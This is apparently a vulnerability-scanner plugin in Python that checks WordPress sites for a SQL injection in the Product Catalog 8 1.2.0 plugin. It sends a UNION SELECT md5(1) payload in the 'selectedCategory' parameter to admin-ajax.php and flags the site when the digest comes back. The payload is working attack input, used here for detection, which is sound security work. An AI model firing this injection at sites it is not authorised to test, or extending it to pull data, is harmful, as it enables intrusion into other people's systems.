#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Generated by ptools
# __Author__ = Anonymous
# _PlugName_ = WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection
# __Refer___ = https://www.exploit-db.com/exploits/40783/
import urllib
def assign(service, arg):
    """Tell the scanner whether this plugin applies to the given service.

    Returns the tuple (True, arg) when the service is the WordPress
    fingerprint, so that audit() later receives arg unchanged. For any
    other service the function returns None.
    """
    is_wordpress = service == fingerprint.wordpress
    if is_wordpress:
        return True, arg
    return None
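def audit(arg):
    """Check a WordPress site for the Product Catalog 8 SQL injection.

    Sends a single POST to wp-admin/admin-ajax.php with the
    'UpdateCategoryList' action and a 'selectedCategory' value that asks
    the database to compute md5(1). No cookies or credentials are set by
    this function. If the response is HTTP 200 and its body contains that
    digest, the parameter reached a SQL query unsanitised and the finding
    is reported through security_hole() together with the request log.

    arg is the base URL of the site; it may or may not end with '/'.
    Nothing is returned.
    """
    # MD5 hex digest of the string "1". The database computes it, so it
    # appears in the body only when the injected SELECT was executed.
    marker = 'c4ca4238a0b923820dcc509a6f75849b'

    # Strip trailing slashes first: a base URL such as 'http://host/'
    # would otherwise yield 'http://host//wp-admin/...'. A server or proxy
    # that redirects or rejects the doubled slash would produce a false
    # negative.
    target = arg.rstrip('/') + '/wp-admin/admin-ajax.php'

    post_data = {
        'selectedCategory': '0 UNION SELECT md5(1),2,3,4,5,6',
        'action': 'UpdateCategoryList',
    }
    code, head, body, redirect_url, log = hackhttp.http(
        target, post=urllib.urlencode(post_data))

    # Requiring both the 200 status and the digest keeps error pages and
    # unrelated responses from being reported.
    if code == 200 and marker in body:
        security_hole(target, log=log)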
if __name__ == "__main__":
    # Stand-alone run against a local test instance. The star import
    # presumably provides the framework names used above (fingerprint,
    # hackhttp, security_hole) -- confirm against the dummy module.
    from dummy import *

    _applies, local_target = assign(fingerprint.wordpress, 'http://127.0.0.1:8080/')
    audit(local_target)